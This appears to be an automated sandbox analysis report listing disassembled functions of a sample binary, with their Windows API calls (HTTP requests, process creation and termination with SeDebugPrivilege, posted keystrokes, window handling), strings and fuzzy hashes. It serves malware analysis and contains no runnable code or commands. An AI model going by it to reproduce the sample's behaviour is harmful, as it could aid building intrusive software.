Part of subcall function 00391DB3: GetWindowRect.USER32(?,?), ref: 00391E1D
Part of subcall function 00391DB3: ScreenToClient.USER32(?,?), ref: 00391E45

GetDC.USER32 ref: 003CCD32
SendMessageW.USER32(?,00000031,00000000,00000000), ref: 003CCD45
SelectObject.GDI32(00000000,00000000), ref: 003CCD53
SelectObject.GDI32(00000000,00000000), ref: 003CCD68
ReleaseDC.USER32(?,00000000), ref: 003CCD70
MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 003CCDFB

Strings

U, xrefs: 003CCCD0

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
String ID: U
API String ID: 4009187628-3372436214
Opcode ID: 620a20b3d3f155a5ef9742bd2ecb0b38f7646e68f37ec664f62ee1f72da1e81e
Instruction ID: 59f7a0b5f2e432bec4da6eb428b6a4fcee4f2c43ba4eec3721008624bf0cedb1
Opcode Fuzzy Hash: 620a20b3d3f155a5ef9742bd2ecb0b38f7646e68f37ec664f62ee1f72da1e81e
Instruction Fuzzy Hash: BC71D231900605EFCF228F64C884EEA7BB5FF49321F15927EED5A9A266D7308C91DB50

Function 00401A15 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 134networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00401A50
HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00401A7C
InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 00401ABE
InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00401AD3
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00401AE0
HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 00401B10
InternetCloseHandle.WININET(00000000), ref: 00401B57

Part of subcall function 00402483: GetLastError.KERNEL32(?,?,00401817,00000000,00000000,00000001), ref: 00402498
Part of subcall function 00402483: SetEvent.KERNEL32(?,?,00401817,00000000,00000000,00000001), ref: 004024AD

Strings

, xrefs: 00401B01

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorEventHandleInfoLastOpenSend
String ID:
API String ID: 2603140658-3916222277
Opcode ID: 7bd48c6a61659d479b25374f038e66bad03e4ba0ac8ce10196bf91683c40a5d9
Instruction ID: 77149f49d584616265d806cc4c40277f31f097bf2348ad0da528a29dfa721693
Opcode Fuzzy Hash: 7bd48c6a61659d479b25374f038e66bad03e4ba0ac8ce10196bf91683c40a5d9
Instruction Fuzzy Hash: 234142B1501214BFEB119F50CC85FFB776CEB08354F00813BF905A6191D7749D459BA9

Function 00408C46 Relevance: 13.9, APIs: 9, Instructions: 438COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,?,0041F910), ref: 00408D28
FreeLibrary.KERNEL32(00000000,00000001,00000000,?,0041F910), ref: 00408D5C
QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00408ED6
SysFreeString.OLEAUT32(?), ref: 00408F00

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: Free$FileLibraryModuleNamePathQueryStringType
String ID:
API String ID: 560350794-0
Opcode ID: bce550b8efd673b2dc83f1f31df929344b1c3604ed7edfe6959700ed5d5cc45c
Instruction ID: 380738181195c7b0a9099322f211ef8800d698eb04694e079e1787bdb6787d98
Opcode Fuzzy Hash: bce550b8efd673b2dc83f1f31df929344b1c3604ed7edfe6959700ed5d5cc45c
Instruction Fuzzy Hash: 32F17A71A00209EFDF04DF94C984EAEB7B9FF49314F108069F945AB291DB35AE46CB94

Function 0040F694 Relevance: 13.9, APIs: 9, Instructions: 386processCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0040F6B5
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0040F848
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0040F86C
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0040F8AC
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0040F8CE
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0040FA4A
GetLastError.KERNEL32(00000000,00000001,00000000), ref: 0040FA7C
CloseHandle.KERNEL32(?), ref: 0040FAAB
CloseHandle.KERNEL32(?), ref: 0040FB22

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
String ID:
API String ID: 4090791747-0
Opcode ID: 5334d5444e77259a96b12b00f9e543b9793042b36209f6f39bfd1e5d4a879c22
Instruction ID: 626c3ad9ffc65ecf5518ab2f947f1e7a897d3c1c6734ca1a6f12a00d387de19d
Opcode Fuzzy Hash: 5334d5444e77259a96b12b00f9e543b9793042b36209f6f39bfd1e5d4a879c22
Instruction Fuzzy Hash: C7E1AE316042009FCB25EF24C881B6BBBE0AF85354F14857EF9999F6A1DB34EC49CB56

Function 003F4CC1 Relevance: 13.7, APIs: 9, Instructions: 170filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 003F466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,003F3697,?), ref: 003F468B

Part of subcall function 003F466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,003F3697,?), ref: 003F46A4

Part of subcall function 003F4A31: GetFileAttributesW.KERNEL32(?,003F370B), ref: 003F4A32

lstrcmpiW.KERNEL32(?,?), ref: 003F4D40
_wcscmp.LIBCMT ref: 003F4D5A
MoveFileW.KERNEL32(?,?), ref: 003F4D75

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
String ID:
API String ID: 793581249-0
Opcode ID: e6093facd4cf8feba9802be318c66f9bd324ab2edb42f2c0b9667145b9dfae96
Instruction ID: a5c1f3c5a1692e5fec22e8ad4a3c4f7f20f22e1266a711cb2342179e84027c2e
Opcode Fuzzy Hash: e6093facd4cf8feba9802be318c66f9bd324ab2edb42f2c0b9667145b9dfae96
Instruction Fuzzy Hash: AF5167B20083499BC726DB64D8819EF73ECAF85350F00492EF789D7152EF34A688C766

Function 00418645 Relevance: 13.7, APIs: 9, Instructions: 168COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 004186FF

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: InvalidateRect
String ID:
API String ID: 634782764-0
Opcode ID: 12e1fcb641597508b0ab7cc623d9a2bd0ac2881a8289526f3eb77c6a8936ac54
Instruction ID: 04206063e7d390b5f5d6bf7355b60841ca8a5d20abd2e3174631fcf8f9ea8ec4
Opcode Fuzzy Hash: 12e1fcb641597508b0ab7cc623d9a2bd0ac2881a8289526f3eb77c6a8936ac54
Instruction Fuzzy Hash: 5751A230500204BEDF209B24CC85FEE7B65AB05324F70412BF954D62E1DB79E9C1CB59

Function 00392B72 Relevance: 13.7, APIs: 9, Instructions: 161windowCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 003CC2F7
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 003CC319
LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 003CC331
ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 003CC34F
SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 003CC370
DestroyIcon.USER32(00000000), ref: 003CC37F
SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 003CC39C
DestroyIcon.USER32(?), ref: 003CC3AB

Part of subcall function 0041A4AF: DeleteObject.GDI32(00000000), ref: 0041A4E8

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
String ID:
API String ID: 2819616528-0
Opcode ID: 77503724b51f449902fc5c7c8f4697b557274ebf952c4d33b3d73d2fd4b93d3d
Instruction ID: 93e2ae910db0d5f0b38031182ffb76ae5d96c9cc3f64091c069a0bf7f33467f2
Opcode Fuzzy Hash: 77503724b51f449902fc5c7c8f4697b557274ebf952c4d33b3d73d2fd4b93d3d
Instruction Fuzzy Hash: 48515674A10609AFDF26EF64DC45FAB3BE9EB18310F108528F906D72A0DB70AC91DB50

Function 003E966E Relevance: 13.6, APIs: 9, Instructions: 66sleepkeyboardwindowCOMMON

Download Yara Rule

APIs

Part of subcall function 003EA82C: GetWindowThreadProcessId.USER32(?,00000000), ref: 003EA84C
Part of subcall function 003EA82C: GetCurrentThreadId.KERNEL32 ref: 003EA853
Part of subcall function 003EA82C: AttachThreadInput.USER32(00000000,?,003E9683,?,00000001), ref: 003EA85A

MapVirtualKeyW.USER32(00000025,00000000), ref: 003E968E
PostMessageW.USER32(?,00000100,00000025,00000000), ref: 003E96AB
Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 003E96AE
MapVirtualKeyW.USER32(00000025,00000000), ref: 003E96B7
PostMessageW.USER32(?,00000100,00000027,00000000), ref: 003E96D5
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 003E96D8
MapVirtualKeyW.USER32(00000025,00000000), ref: 003E96E1
PostMessageW.USER32(?,00000101,00000027,00000000), ref: 003E96F8
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 003E96FB

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
String ID:
API String ID: 2014098862-0
Opcode ID: 6f042b02495042411382e598073f6a23197b5200a641a0ac35ed819f820010a7
Instruction ID: 7739afb1d857a338860ed8be840b09c31d43664bcf3672ca8b44300f2984297f
Opcode Fuzzy Hash: 6f042b02495042411382e598073f6a23197b5200a641a0ac35ed819f820010a7
Instruction Fuzzy Hash: 4111E571950A18BEF6106F61DC49FAA3F1DEB4C760F104535F244AB0E0C9F25C12DAA8

Function 003E8921 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,0000000C), ref: 003E892A
HeapAlloc.KERNEL32(00000000), ref: 003E8931
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 003E8946
GetCurrentProcess.KERNEL32(?,00000000), ref: 003E894E
DuplicateHandle.KERNEL32(00000000), ref: 003E8951
GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002), ref: 003E8961
GetCurrentProcess.KERNEL32(?,00000000), ref: 003E8969
DuplicateHandle.KERNEL32(00000000), ref: 003E896C
CreateThread.KERNEL32(00000000,00000000,003E8992,00000000,00000000,00000000), ref: 003E8986

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
String ID:
API String ID: 1957940570-0
Opcode ID: 0772afdf0beba8233ce707712c0967e5d0ed99255fdfe34027a258735f18a924
Instruction ID: ecc6ace9d65e8c472d8556750ca78942648fc417365124c241a330536b30806b
Opcode Fuzzy Hash: 0772afdf0beba8233ce707712c0967e5d0ed99255fdfe34027a258735f18a924
Instruction Fuzzy Hash: 1A01BFB5640344FFE710ABA5DC4DFA73B6CEB89711F408521FA05DB191CA759C05CB24

Function 00409B23 Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 352COMMON

Download Yara Rule

Strings

NULL Pointer assignment, xrefs: 00409BA4, 00409EC8
Not an Object type, xrefs: 00409B7B

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID:
String ID: NULL Pointer assignment$Not an Object type
API String ID: 0-572801152
Opcode ID: 5711f84041addd426d99d78487129a7218865f97f3c62ad755412919faeeba83
Instruction ID: dfd79d92d74db45176b58c5c91652170e7894d0a84df2528c021655ab28b379b
Opcode Fuzzy Hash: 5711f84041addd426d99d78487129a7218865f97f3c62ad755412919faeeba83
Instruction Fuzzy Hash: EAC19071A0021A9BDF10DF98D884AAFB7F5BF48314F14853AE905BB2C2E774AD45CB94

Function 0040975D Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 242COMMON

Download Yara Rule

APIs

Part of subcall function 003E710A: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,003E7044,80070057,?,?,?,003E7455), ref: 003E7127
Part of subcall function 003E710A: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,003E7044,80070057,?,?), ref: 003E7142
Part of subcall function 003E710A: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,003E7044,80070057,?,?), ref: 003E7150
Part of subcall function 003E710A: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,003E7044,80070057,?), ref: 003E7160

CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00409806
_memset.LIBCMT ref: 00409813
_memset.LIBCMT ref: 00409956
CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 00409982
CoTaskMemFree.OLE32(?), ref: 0040998D

Strings

NULL Pointer assignment, xrefs: 004099DB

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
String ID: NULL Pointer assignment
API String ID: 1300414916-2785691316
Opcode ID: 7ab09c21702845fcf6df56a3f7e1e34dfe21c5363cb0aa6e2af367e8b6e114e4
Instruction ID: f0b1e523d1c028f872956e7a9ffa8a2df5eef6f10812b6ec887dca1601c2cee5
Opcode Fuzzy Hash: 7ab09c21702845fcf6df56a3f7e1e34dfe21c5363cb0aa6e2af367e8b6e114e4
Instruction Fuzzy Hash: B0914871D00229EBDF11DFA5DC41EDEBBB9AF48310F20416AF519AB281DB719A44CFA0

Function 00416D80 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00416E24
SendMessageW.USER32(?,00001036,00000000,?), ref: 00416E38
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00416E52
_wcscat.LIBCMT ref: 00416EAD
SendMessageW.USER32(?,00001057,00000000,?), ref: 00416EC4
SendMessageW.USER32(?,00001061,?,0000000F), ref: 00416EF2

Strings

SysListView32, xrefs: 00416DF6

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: MessageSend$Window_wcscat
String ID: SysListView32
API String ID: 307300125-78025650
Opcode ID: 0704cf82525cec9e3f0f7427a1be4fede4d1521c27d38054a53d599825257938
Instruction ID: 5f55bf8cea2ec7c4f8aa30ad9d67b93ae36087b2ac931d5b5e9cd7c00f692ebd
Opcode Fuzzy Hash: 0704cf82525cec9e3f0f7427a1be4fede4d1521c27d38054a53d599825257938
Instruction Fuzzy Hash: 1D41AF70A40308ABEB21DF64CC85BEB77A8EF08354F11452AF984E7291D775DD898B68

Function 0040E933 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON

Download Yara Rule

APIs

Part of subcall function 003F3C55: CreateToolhelp32Snapshot.KERNEL32 ref: 003F3C7A
Part of subcall function 003F3C55: Process32FirstW.KERNEL32(00000000,?), ref: 003F3C88
Part of subcall function 003F3C55: CloseHandle.KERNEL32(00000000), ref: 003F3D52

OpenProcess.KERNEL32(00000001,00000000,?), ref: 0040E9A4
GetLastError.KERNEL32 ref: 0040E9B7
OpenProcess.KERNEL32(00000001,00000000,?), ref: 0040E9E6
TerminateProcess.KERNEL32(00000000,00000000), ref: 0040EA63
GetLastError.KERNEL32(00000000), ref: 0040EA6E
CloseHandle.KERNEL32(00000000), ref: 0040EAA3

Strings

SeDebugPrivilege, xrefs: 0040E9C2

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
String ID: SeDebugPrivilege
API String ID: 2533919879-2896544425
Opcode ID: 54306967039a4b30eb7412ace02a0d182a49ee666f72e8564c553e095c02dae0
Instruction ID: 168daa6db9e7b15349b119704065f64704ddc32fc130c19a5819789fb1ece744
Opcode Fuzzy Hash: 54306967039a4b30eb7412ace02a0d182a49ee666f72e8564c553e095c02dae0
Instruction Fuzzy Hash: DA41AC713002009FDB16EF19CC96F6EB7A5AF45310F14842EF9065F2D2DB74A815CB99

Function 003F2F94 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 82windowCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000000,00007F03), ref: 003F3033

Strings

info, xrefs: 003F2FD4
warning, xrefs: 003F301C
blank, xrefs: 003F2FB5
stop, xrefs: 003F3004
question, xrefs: 003F2FEC

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: IconLoad
String ID: blank$info$question$stop$warning
API String ID: 2457776203-404129466
Opcode ID: 377df45b9751ff9a70a07ac253b4d24068e78220dad823048c12c5f4f6f2c168
Instruction ID: d98e3358df066306c16cba39bf10a0d8f41458d7f9f2bf8e65250a4d1e654839
Opcode Fuzzy Hash: 377df45b9751ff9a70a07ac253b4d24068e78220dad823048c12c5f4f6f2c168
Instruction Fuzzy Hash: 5511273134838BBEF7169A55DC42DBF779C9F15364B20002BFB01AA581DF749F4056A9

Function 003F42F8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 003F4312
LoadStringW.USER32(00000000), ref: 003F4319
GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 003F432F
LoadStringW.USER32(00000000), ref: 003F4336
_wprintf.LIBCMT ref: 003F435C
MessageBoxW.USER32(00000000,?,?,00011010), ref: 003F437A

Strings

%s (%d) : ==> %s: %s %s, xrefs: 003F4357

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: HandleLoadModuleString$Message_wprintf
String ID: %s (%d) : ==> %s: %s %s
API String ID: 3648134473-3128320259
Opcode ID: ec44a09830a392e42fb136e5e9fb2cbb628adda78e47477ebe4f79e58c899794
Instruction ID: 9ca2c93ab18ecd4b4680cc9e134047cbe9d4f78a4eb9464a758fb27ba2843d7c
Opcode Fuzzy Hash: ec44a09830a392e42fb136e5e9fb2cbb628adda78e47477ebe4f79e58c899794
Instruction Fuzzy Hash: 050144F6900208BFE751E790DD89EF7776CD708300F4045B6BB45E6051EA745E8A4B78

Function 0041D43E Relevance: 12.3, APIs: 8, Instructions: 257windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00392612: GetWindowLongW.USER32(?,000000EB), ref: 00392623

GetSystemMetrics.USER32(0000000F), ref: 0041D47C
GetSystemMetrics.USER32(0000000F), ref: 0041D49C
MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 0041D6D7
SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 0041D6F5
SendMessageW.USER32(00000003,00000469,?,00000000), ref: 0041D716
ShowWindow.USER32(00000003,00000000), ref: 0041D735
InvalidateRect.USER32(?,00000000,00000001), ref: 0041D75A
DefDlgProcW.USER32(?,00000005,?,?), ref: 0041D77D

Memory Dump Source

